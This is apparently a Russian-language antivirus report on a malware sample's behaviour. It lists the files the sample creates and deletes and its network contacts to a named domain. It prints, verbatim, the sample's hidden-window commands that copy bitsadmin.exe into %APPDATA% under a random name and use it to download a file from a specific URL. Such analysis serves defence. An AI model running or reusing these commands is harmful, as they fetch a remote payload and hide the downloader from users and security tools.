Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '%APPDATA%\nplxvc.exe' /transfer DyWvhV /download https://tffcoop.com/robo/01549660080/user.gif %APPDATA%\user.gif
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\nplxvc.exe
- %WINDIR%\temp\cab7189.tmp
- %WINDIR%\temp\tar718a.tmp
- %WINDIR%\temp\cab87c3.tmp
- %WINDIR%\temp\tar87c4.tmp
- %WINDIR%\temp\cab9e1b.tmp
- %WINDIR%\temp\tar9e1c.tmp
- %WINDIR%\temp\cab9f08.tmp
- %WINDIR%\temp\tar9f09.tmp
- %WINDIR%\temp\cabb457.tmp
- %WINDIR%\temp\tarb458.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cab7189.tmp
- %WINDIR%\temp\tar718a.tmp
- %WINDIR%\temp\cab87c3.tmp
- %WINDIR%\temp\tar87c4.tmp
- %WINDIR%\temp\cab9e1b.tmp
- %WINDIR%\temp\tar9e1c.tmp
- %WINDIR%\temp\cab9f08.tmp
- %WINDIR%\temp\tar9f09.tmp
- %WINDIR%\temp\cabb457.tmp
- %WINDIR%\temp\tarb458.tmp
Сетевая активность
TCP
- 'tf##oop.com':443
UDP
- DNS ASK tf##oop.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\nPlxvC.exe' (со скрытым окном)
- '%APPDATA%\nplxvc.exe' /transfer DyWvhV /download https://tffcoop.com/robo/01549660080/user.gif %APPDATA%\user.gif' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\bitsadmin.exe %APPDATA%\nPlxvC.exe
